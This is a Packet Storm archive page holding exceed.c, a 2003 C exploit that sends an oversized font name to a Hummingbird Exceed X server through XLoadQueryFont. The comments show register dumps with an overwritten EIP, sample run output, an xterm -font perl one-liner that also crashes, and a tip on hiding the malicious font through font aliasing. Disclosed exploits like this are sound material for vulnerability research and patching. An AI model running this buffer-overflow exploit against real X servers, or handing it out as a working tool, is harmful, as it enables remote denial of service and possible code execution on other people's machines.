exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

exceed.c

exceed.c
Posted Jul 14, 2003
Authored by c0ntex

Hummingbird's Exceed X emulator mishandles fonts and is vulnerable to both remote and local denial of service attacks and may allow an attacker to remotely gain root privileges.

tags | exploit, remote, denial of service, local, root
SHA-256 | 4229f6700178e0c3f5a09ba9b35ac021fc622a1b8acd2e2bc7bda54b9d98eea6

exceed.c

Change Mirror Download
/*
* Crushing birds for fun and knowledge
* ------------------------------------
*
* HQOTD: "How secure do you want it"
* http://mimage.hummingbird.com/alt_content/binary/pdf/collateral/ds/exceed_ds_en.pdf
*
* I'll tell you: Much more please sirs.
*
* **************************************
*
* Exceed has some bugs caused by the way it handles fonts, in a local and remote
* context.
*
* Debug output created by master techniques:
* EAX = C0000000
* EBX = 00000000
* ECX = 40000000
* EDX = 00000501
* ESI = 41414141 <-------- // Here
* EDI = 0012E138
* EIP = 41414141 <-------- // Here
* ESP = 0012E0C8
* EBP = 0012E0F0
*
* A way to check that a server is not trying to exploit your PC could be:
* $ xlsfonts -display exceed_server:0.0
* ...
* --------0------
* --arial-bold-r---0-0-120-120-p-0-iso8859-1
* --arial-medium-r---0-0-120-120-p-0-iso8859-1
* AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... <-- Here
* ...
*
* A way to hide evil font would be through the use of font aliasing.
* -the first ever font spoofing technique, lol.
*
* [-] We can crash a local Exceed server * 2
* [-] We can crash a remote Exceed server * many lol
* [-] We can crash Exceed client that uses evil X Font Server * 1
* [-] We can write over EIP address * many lol
*
* Hummingbird informed 3 weeks ago, still no reply.
*
* **************************************
* rwxr-xr-x xterm exploit!
*
* $ export DISPLAY=192.168.1.31:0.0 //Valid host
* $ xterm -font `perl -e 'print "69r"x10101'`
* Segmentation fault (core dumped) //lol
* $ md5sum `which xterm`
* 09ebe34028b779eb73d4a31e987ee9ed /usr/X11R6/bin/xterm
*
* Root user can now have super 0day xterm sploit that s/he can use to own local user
* accounts!
*
* ** This would give root the ability to become any user on the system **
*
* More serious than su, it does not leave a log entry behind, real anon hacker style.
*
* **************************************
*
* This is just a little hobby that saves me going to clubs at the weekend, drinking
* beer and mumbling to some strange lethargic woman with alchohol driven motives.
*
* Computer security is #1 contraceptive, coming soon to an NHS near you.
*
* **************************************
*
* DNSCon is coming up - www.dnscon.org
*
* **************************************
*
* [c0ntex@darkside exceed]$ gcc -o exceed exceed.c -lX11 -L /usr/X11R6/lib
* [c0ntex@darkside exceed]$ ./exceed exploited:0.0
*
* [-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com
* [-] We are using DISPLAY variable: exploited:0.0
* [-] Hang on to your feathers, sending some buffer
*
* ..
* XIO: fatal IO error 104 (Connection reset by peer) on X server "exploited:0.0"
* after 11 requests (9 known processed) with 0 events remaining.
*
* **************************************
*
* Rants:
* Knowledge is freely given and should be freely shared, however making money from
* other peoples research in any way is simply unethical. =|
*
* SF: Clever move making your vulnerability archive public `again`, this will draw
* back many versed in dot slash t3qN33kZ to infect themselves with trojan opcodes.
* *LOL*
*
* Regards to all, keep it real.
*
* **************************************
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <X11/Xlib.h>

#define BIGBIRD 6001
#define DIRTY_VAL 69
#define MAX_BORDER_LEN 3
#define WIN_TIMER 5
#define WIN_TITLE "simple PoC window - lets shoot birds"

typedef char Birds;

int main(int argc, char *argv[])
{
Birds nests[BIGBIRD];
Birds egg[2] = { 'A', '\0' };
Birds *feathersN;
Birds *HABITAT = "DISPLAY";

unsigned short eggs, chicks;
unsigned short winW, winH, feathersW, feathersH;
unsigned long locX, locY;
unsigned long winBDR;


Display* feathers;
Window wingspan;
XFontStruct* birdcull;

fprintf(stderr, "\n\n[-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com\n");

if(argc < 2) {
fprintf(stderr, "[-] Please set IP/Hostname for DISPLAY pointer!\n");
fprintf(stderr, "[-] Usage: %s <hostname/IP:feathers>\n\n", argv[0]);
return EXIT_FAILURE;
}

if(setenv(HABITAT, argv[1], 1) <0) {
perror("setenv"); return EXIT_FAILURE;
}

fprintf(stderr, "[-] Ok, using DISPLAY variable: %s\n", argv[1]);

for(eggs = 0; eggs < BIGBIRD -1; eggs++)
if(strncat(nests, egg, sizeof(BIGBIRD)-1) == NULL) {
perror("strncat"); return EXIT_FAILURE;
}

if((feathers = XOpenDisplay(feathersN)) == NULL) {
perror("XOpenDisplay"); return EXIT_FAILURE;
}

chicks = DefaultScreen(feathers);

winW = ((feathersW = DisplayWidth(feathers, chicks)) /3);
winH = ((feathersH = DisplayHeight(feathers, chicks)) /3);
locX = DIRTY_VAL; locY = DIRTY_VAL; winBDR = MAX_BORDER_LEN;

wingspan = XCreateSimpleWindow(feathers, RootWindow(feathers, chicks),
locX, locY, winW, winH, winBDR,
BlackPixel(feathers, chicks),
WhitePixel(feathers, chicks));
if(XCreateSimpleWindow == NULL) {
perror("XCreateSimpleWindow"); return EXIT_FAILURE;
}

XStoreName(feathers, wingspan, WIN_TITLE);
if(XStoreName == NULL) {
perror("XOpenDisplay"); return EXIT_FAILURE;
}

XMapWindow(feathers, wingspan);
if(XMapWindow == NULL) {
perror("XOpenDisplay"); return EXIT_FAILURE;
}

fprintf(stderr, "[-] Hang on to your feathers, sending some buffer \n\n");

if((birdcull = XLoadQueryFont(feathers, nests)) == NULL) {
perror("XLoadQueryFont"); return EXIT_FAILURE;
}

XCloseDisplay(feathers);

return EXIT_SUCCESS;
}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close